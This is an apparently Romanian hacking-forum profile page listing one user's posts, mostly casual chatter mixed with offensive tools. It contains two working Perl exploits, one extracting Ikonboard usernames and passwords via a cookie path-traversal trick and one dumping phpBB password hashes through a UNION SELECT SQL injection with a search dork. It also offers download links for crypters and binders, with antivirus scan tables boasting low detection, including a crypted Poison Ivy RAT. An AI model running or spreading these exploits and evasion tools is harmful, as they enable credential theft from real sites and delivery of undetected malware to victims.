Ras
-
Posts
1106 -
Joined
-
Last visited
-
Days Won
1
Posts posted by Ras
-
-
scrieti "tits"
-
Mai sunt si mass-urile alea in care iti moare tot neamu. IMPOSIBIL.
Mai sunt si mass-urile alea in care se inchide yahoo. Sa inchida odata yahoo asta.
-
http://www.youtube.com/watch?v=jivAOvzTjhM&NR=1
uitati-va aici pana la capat :lol::lol:
-
5. Nu se posteaza NIMIC in legatura cu:
- carti de credit
- conturi paypal
- conturi Western Union
- conturi ebay
nu trebuia sa iti zic eu asta...
-
-
adika ce veri sa zici cu asta
ne spui si noua ce program este sau o poza ceva.
-
ce face?
"exploit" ddos! pur si simplu pica forumul! desi nu creca ca merge daca ii activat captcha
nu ati citit ce a scris kwe.
-
vedeti si voi care e diferenta
-
welcome... tu esti kreator de pe mt nu?
-
AhnLab-V3 2007.9.1.0 2007.09.03 -
AntiVir 7.4.1.66 2007.09.02 -
Authentium 4.93.8 2007.09.02 -
Avast 4.7.1029.0 2007.09.02 -
AVG 7.5.0.484 2007.09.02 -
CAT-QuickHeal 9.00 2007.09.01 -
ClamAV 0.91.2 2007.09.02 -
DrWeb 4.33 2007.09.03 -
eSafe 7.0.15.0 2007.09.02 -
eTrust-Vet 31.1.5100 2007.08.31 -
Ewido 4.0 2007.09.02 -
FileAdvisor 1 2007.09.03 -
Fortinet 3.11.0.0 2007.09.03 -
F-Prot 4.3.2.48 2007.09.02 -
F-Secure 6.70.13030.0 2007.09.03 -
Ikarus T3.1.1.12 2007.09.03 -
Kaspersky 4.0.2.24 2007.09.03 -
McAfee 5110 2007.08.31 -
Microsoft 1.2803 2007.09.03 -
NOD32v2 2498 2007.09.03 -
Norman 5.80.02 2007.09.02 -
Panda 9.0.0.4 2007.09.02 -
Prevx1 V2 2007.09.03 -
Rising 19.38.62.00 2007.09.02 -
Sophos 4.21.0 2007.09.02 -
Sunbelt 2.2.907.0 2007.08.31 -
TheHacker 6.1.9.175 2007.09.02 -
VBA32 3.12.2.3 2007.09.01 -
VirusBuster 4.3.26:9 2007.09.02 -
Webwasher-Gateway 6.0.1 2007.09.02 Win32.Malware.gen!88 (suspicious) -
|||MENU|||
Primul buton: ADD/OPEN
Al doilea: DELETE
Al treilea: NEW PROJECT
Al patrulea: ABOUT
Download: http://rapidshare.com/files/52870514/PowerCrypt.rar
-
din cate stiu nu se mai formateaza.
-
-
Nu stiu!
Nu am folosit acest crypter.
-
este activat. da nu inteleg asta '
cred ca trebuie sa fie decat
-
-
#!/usr/bin/perl -w
use strict;
use LWP::UserAgent;
use HTTP::Cookies;
&help unless $#ARGV == 2;
&help unless $ARGV[0] =~ m/^(.*)\\.(.*)/gi;
&help unless $ARGV[2] =~ m/^\\/(.*)\\//gi;
my $host = $ARGV[0];
my $user = $ARGV[1];
my $path = $ARGV[2];
our $lwp = new LWP::UserAgent;
$lwp -> agent(\"Ik0nb04d w4r3z by n0stur. ph33r bitchez!\");
our $get = $lwp -> get(\"http://\".$host.\"/cgi-bin\".$path.\"search.cgi?action=display\", \'Cookie\' => \"amembernamecookie=../members/\".$user.\".cgi%00;\") || print \"\\n[-] $!\\n\";
if($get->content() =~ /$user/){ print \"\\n[*] Vulnerable\\n\";} else { &end; }
$get->content() =~ /forum=(\\w+)&topic=(\\w+)/;
print \"\\n[+] Username: \".$1.\"\\n\";
print \"[+] Password: \".$2.\"\\n\";
print \"Service provided by nostur. njoy, bitchez!\\n\";
sub help {
print qq^
Ikonboard all versions remote password disclosure
Found by: anonymous...
Code by: nostur
->Usage: $0 <host> <user> <path_to_ikonboard_in_cgibin>
^;
die(\"\\nNot enough parameters, check the code...\\n\");
}
sub end { die(\"\\n[-]Not Vulnerable\\n\"); }
# notsec.com -
-
fuck..eu cu sysghost am mai avut privat bugu asta
e public de mai mult timp dar nu l-am pus eu aici
imi cer scuze pt offtopic.
-
AhnLab-V3 2007.7.14.0 2007.07.17 no virus found
AntiVir 7.4.0.42 2007.07.17 HEUR/Malware
Authentium 4.93.8 2007.07.17 no virus found
Avast 4.7.997.0 2007.07.17 no virus found
AVG 7.5.0.476 2007.07.16 Dropper.Generic.NDH
BitDefender 7.2 2007.07.17 no virus found
CAT-QuickHeal 9.00 2007.07.17 no virus found
ClamAV devel-20070416 2007.07.17 no virus found
DrWeb 4.33 2007.07.17 no virus found
eSafe 7.0.15.0 2007.07.17 no virus found
eTrust-Vet 30.8.3789 2007.07.17 no virus found
Ewido 4.0 2007.07.17 no virus found
FileAdvisor 1 2007.07.17 no virus found
Fortinet 2.91.0.0 2007.07.17 no virus found
F-Prot 4.3.2.48 2007.07.17 no virus found
Ikarus T3.1.1.8 2007.07.17 no virus found
Kaspersky 4.0.2.24 2007.07.17 no virus found
McAfee 5076 2007.07.17 MultiDropper-JD
Microsoft 1.2704 2007.07.17 no virus found
NOD32v2 2403 2007.07.17 no virus found
Norman 5.80.02 2007.07.17 no virus found
Panda 9.0.0.4 2007.07.17 Suspicious file
Sophos 4.19.0 2007.07.16 no virus found
Sunbelt 2.2.907.0 2007.07.16 no virus found
Symantec 10 2007.07.17 no virus found
TheHacker 6.1.7.148 2007.07.16 no virus found
VBA32 3.12.2 2007.07.16 no virus found
VirusBuster 4.3.23:9 2007.07.17 no virus found
Webwasher-Gateway 6.0.1 2007.07.17 Heuristic.Malware
Download: http://rapidshare.com/files/52421719/Adrenaline_Binder.rar
-
Poison Ivy 2.3.0 este scanat mai sus dupa ce a fost cryptat.
Download: http://rapidshare.com/files/52420486/Cryptic_v1.5.rar
-
#!/usr/bin/perl
print q{
phpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection Exploit
Bug discovered by Don
Dork: allinurl:links.php?t=search
or: "Links MOD v1.2.2 by phpBB2.de"
SQL INJECTION: Exploit: links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=2/*
};
use IO::Socket;
print q{
=> Insert URL
=> without ( http )
=> };
$server = <STDIN>;
chop ($server);
print q{
=> Insert directory
=> es: /forum/ - /phpBB2/
=> };
$dir = <STDIN>;
chop ($dir);
print q{
=> User ID
=> Number:
=> };
$user = <STDIN>;
chop ($user);
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=".$user."/*";
print "
Exploit in process...\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";
print "Exploit\r\n";
print "in process...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "Exploit finished!\r\n\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "MD5-Hash is: ".$1."\r\n";
}
exit();
}
} -
Sp[L]o1T: ai casca de cosmonaut ?
aici imi place )
-
damn ))
phpBB 3.0 SQL Injection
in Exploituri
Posted